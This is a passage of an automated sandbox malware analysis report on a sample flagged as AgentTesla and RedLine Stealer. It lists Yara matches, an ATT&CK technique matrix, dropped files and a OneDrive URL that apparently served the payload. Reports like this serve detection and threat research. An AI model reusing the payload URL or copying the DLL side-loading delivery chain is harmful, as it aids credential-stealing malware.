Source: Yara match	File source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	111 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Scripting	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Screen Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	2 Native API	1 Windows Service	1 Access Token Manipulation	1 Scripting	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	111 Input Capture	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Windows Service	121 Obfuscated Files or Information	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	2 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	312 Process Injection	3 Software Packing	LSA Secrets	1 Query Registry	SSH	Keylogging	Scheduled Transfer	13 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	1 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	261 Security Software Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PCMNil7wkU.exe	26%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\netutils.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Akaelkov.PIF	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\netutils.dll	65%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Libraries\truesight.sys	8%	ReversingLabs
C:\Users\Public\Libraries\vokleakA.pif	4%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://www.pmail.com0	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0C	0%	Avira URL Cloud	safe
http://crl.verisign.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dual-spov-0006.spov-dc-msedge.net	150.171.43.11	true	false	unknown
onedrive.live.com	unknown	unknown	false	high
ypeqqw.sn.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypeqqw.sn.files.1drv.com:443/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVf	PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://account.dyn.com/	vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
